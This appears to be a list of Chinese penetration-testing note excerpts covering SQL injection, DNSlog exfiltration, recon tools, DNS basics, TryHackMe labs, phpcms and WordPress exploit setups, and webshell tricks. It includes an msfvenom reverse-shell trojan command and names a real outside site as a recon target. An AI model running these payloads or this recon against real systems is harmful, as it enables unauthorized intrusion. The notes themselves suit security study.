SQL 注入原理: 假設一個傳到後端資料庫的語句的參數是沒有過濾的，可以透過burpsuite 修改http請求封包，透過單引號閉合，或是註解，或是條件語句來測試注入類型。 1.回顯型 通常比較簡單，搭配 union 的注入方式，或是報錯注入，判斷語句欄位數量，在慢慢注入出所有資料。 2.bool 型回顯，能判斷的方式，只有兩種情況，true 跟 false， 雖說可以手動注入，但很花費時間，通常會交給自動化工具 sqlmap ，通常我會使用 -r 參數， 先用 burpsuite 抓包存成txt 檔，最後交給sqlmap。 3.bool 型不回顯，

目標 某個黃色盜版網站，借我當目標測試 dmoe.in virustotal (子域) pic.dmoe.in www.dmoe.in virustotal 歷史 SSL Certificates dmoe.org Thumbprint

資產蒐集階段 (擴大攻擊面) 子域蒐集常用工具 subfinder (被動源，要配置api) amass (可以輸出到maltego，也自帶DB功能，所以好用) maltego (好用 要配置api) oneforall (好用) the harevest (堪用) 域名替換 altdns https://www.whoxy.com/

load_file读文件 設置Load_file狀態 在MySQL注入中DNSlog外帶主要利用MySQL內置函數load_file()函數，load_file()不僅能讀取本地文件也能通過UNC的方式讀取遠程文件。 Load_file函數狀態： 要求用户具有file权限 通常root 才有 當secure_file_priv為空，則表示沒有任何限制。 當secure_file_priv為指定目錄，則表示數據庫導入導出只能在指定目錄。

low: 改密碼 get : <form action="#" method="GET"> New password:<br /> <input type="password" autocomplete="off" name="password_new" /><br /> Confirm new password:<br /> <input type="password" autocomplete="off" name="password_conf" /><br /> <br /> <input type="submit" value="Change" name="Change" />

實驗房間:https://tryhackme.com/room/postexploit opevpn sudo openvpn 下載好的vpn 官方給出了你的身分和目標IP Your machine IP is MACHINE_IP Username: Administrator Password: P@$$W0rd

教學網址: https://www.bilibili.com/video/BV13X4y1c7sn/?p=3 基本資訊 並 初始化 目錄 //version git --version // set username git config --global user.name "git3345678git"

顯示參數 msfvenom -l formats msfvenom -l payloads 生成木馬(32bits) // 生成木馬 msfvenom -p windows/meterpreter_reverse_tcp -f exe -a x86 --platform windows -o ./123.exe lhost=192.168.43.84 lport=4444 生成木馬(64bits)

舉例(黃遊網): https://www.tianshie.com/robots.txt User-agent: * Disallow: /wp-admin/ Disallow: /index.php Disallow: /index.html Disallow: /*/feed Disallow: /trackback/ Disallow: /*?replytocom=*

room: https://tryhackme.com/room/wordpresscve202129447 參考: https://www.ddosi.org/cve-2021-29447/ 連VPN sudo openvpn cow3345678cow.ovpn ifocnfig

以下是一些常用的 Google Hacking 语法表： site: 搜索特定网站或域名。 例如：site:example.com inurl: 搜索 URL 中包含特定关键词的页面。 例如：inurl:admin intitle: 搜索页面标题中包含特定关键词的页面。 例如：intitle:"index of" intext: 搜索页面内容中包含特定关键词的页面。 例如：intext:password

SOA（Start of Authority）记录是DNS（Domain Name System）中的一种资源记录类型，用于定义特定域名区域（Zone）的授权和管理信息。SOA记录通常是每个域名区域的第一个记录，并指定了该区域的控制参数。 SOA记录包含以下信息： 主服务器（MNAME）：指定负责该域名区域的主DNS服务器的域名。主服务器是该区域的授权服务器，负责存储和提供该区域的DNS记录。 管理者邮箱（RNAME）：指定负责该域名区域的管理者的电子邮件地址。通常是指域名的管理员或域名注册人。 序列号（Serial）：用于标识该区域的版本号或变更序列号。当对该区域进行更改时，应递增序列号，以便其他DNS服务器知道是否需要更新其缓存。 刷新时间（Refresh）：指定其他DNS服务器应该查询该区域以获取最新数据的时间间隔。刷新时间表示主服务器在其数据发生变化后，其他服务器多久可以向主服务器查询以获取更新的数据。 重试时间（Retry）：指定其他DNS服务器在无法连接到主服务器时应重新尝试查询的时间间隔。重试时间表示其他服务器在无法与主服务器通信时，多久可以再次尝试连接。 过期时间（Expire）：指定其他DNS服务器应停止使用该区域数据的时间。如果其他服务器无法获取到最新数据，并且过期时间已过，它们将不再响应对该区域的查询。

CDN（Content Delivery Network）是一種分散式的網絡架構，用於加速網站和應用程式的內容傳遞。它的原理是將內容複製到位於不同地理位置的多個伺服器（稱為邊緣節點或緩存伺服器），使用戶可以從最接近他們的節點獲取內容，從而提供更快的加載速度和更好的用戶體驗。 以下是 CDN 的工作原理： 緩存：CDN 將源服務器上的內容（如靜態文件、圖像、視頻等）複製到位於全球不同位置的緩存伺服器。這些緩存伺服器通常位於不同的數據中心，分佈在各個地理區域。 選擇最近節點：當用戶訪問網站或應用程式時，CDN 會根據用戶的地理位置，選擇距離用戶最近的節點（邊緣節點）。 內容交付：當用戶請求特定內容時，CDN 會將該內容從最接近用戶的節點傳遞給用戶。由於距離更近，數據傳輸的延遲時間較低，因此用戶可以更快地獲得內容。 動態內容請求：對於動態生成的內容（如動態網頁、個人化內容等），CDN 會將請求轉發到原始服務器，獲取最新的內容，然後再將其傳遞回用戶。 快取更新：當原始服務器上的內容發生更改時，CDN 可以通過不同的機制（如定時更新、手動刷新或事件驅動）來更新緩存伺服器上的內容，以確保用戶獲取到最新的版本。

NS 記錄 NS（Name Server）記錄用於指定域名的 DNS 伺服器。它指定哪些 DNS 伺服器應該被用來查詢該域名的 DNS 記錄。NS 記錄通常由域名註冊商或 DNS 服務商提供，並用於指向管理該域名 DNS 記錄的伺服器。 以下是 NS 記錄的一些重要資訊和功能： 指定主要和次要 DNS 伺服器：NS 記錄允許你指定一個或多個主要和次要 DNS 伺服器，它們負責管理和提供該域名的 DNS 資訊。 分散 DNS 查詢負載：通過在 NS 記錄中指定多個 DNS 伺服器，你可以分散 DNS 查詢的負載。當有人查詢該域名的 DNS 記錄時，查詢將分散到指定的 DNS 伺服器之間，從而提高查詢效能和容量。 DNS 記錄權威性：NS 記錄指定的 DNS 伺服器被視為該域名的 DNS 記錄的權威來源。當其他 DNS 伺服器需要查詢該域名的 DNS 記錄時，它們會向指定的 NS 記錄所指定的伺服器進行查詢。 域名轉移：在域名轉移的情況下，你需要更新 NS 記錄以指向新的 DNS 伺服器。這樣，該域名的 DNS 查詢將被導向新的伺服器，並繼續由新的管理者管理。

登錄phpcms的管理員後台，在擴展模塊找到數據庫工具，選中數據庫文件可以備份數據庫 我這邊backup三個 phpcms\caches\bakup\default\0gxzgvxskyfaz86zy5cu_db_20230301_1.sql phpcms\caches\bakup\default\grtg4v4ft42sw48ak05g_db_20230301_1.sql phpcms\caches\bakup\default\ve6igdedpgr85gxckrz8_db_20230301_1.sql

這個漏洞與前一個漏洞利用方法類似。都是東拼西湊出payload。 首先 wap 模塊拿到一個cookie 這個cookie 是被sys_auth 加密的 payload: http://localhost/index.php?m=wap&c=index&siteid=1 cookie: NpHtD_siteid:8fd5A2tsnl0lQ3wc3-IGFybAOxdmDySOEzWntfgG

重點 part1 phpcms/modules/wap/index.php __construct函數 function __construct() { $this->db = pc_base::load_model('content_model'); $this->siteid = isset($_GET['siteid']) && (intval($_GET['siteid']) > 0) ? intval(trim($_GET['siteid'])) : (param::get_cookie('siteid') ? param::get_cookie('siteid') : 1); param::set_cookie('siteid',$this->siteid); $this->wap_site = getcache('wap_site','wap');

環境: win7 mamp (apache + mysql) wordpress 創建一個一般使用者 漏洞插件: WordPress Ultimate Product Catalogue 4.2.2 一些坑: mysql.ini 加上 secure_file_priv=

版本: wordpress: 4.9.0 - 4.9.6 WP管理者需要給一個帳號至少是author。 在wp目錄下創 222.txt (之後要刪除這個文件) 拉一張圖片上去並編輯 http://localhost/wp-admin/media-new.php

這個洞也是基於 apache 解析漏洞，跟上次的重裝漏洞一樣，只不過利用的code區塊不一樣，這次被改為寫入shell 複習: <?php echo "123" ;?> 存成 test.php // 解釋為php 存成 test.txt // 解釋為txt 存成 test.php.bak // 不認識bak 所以解析為php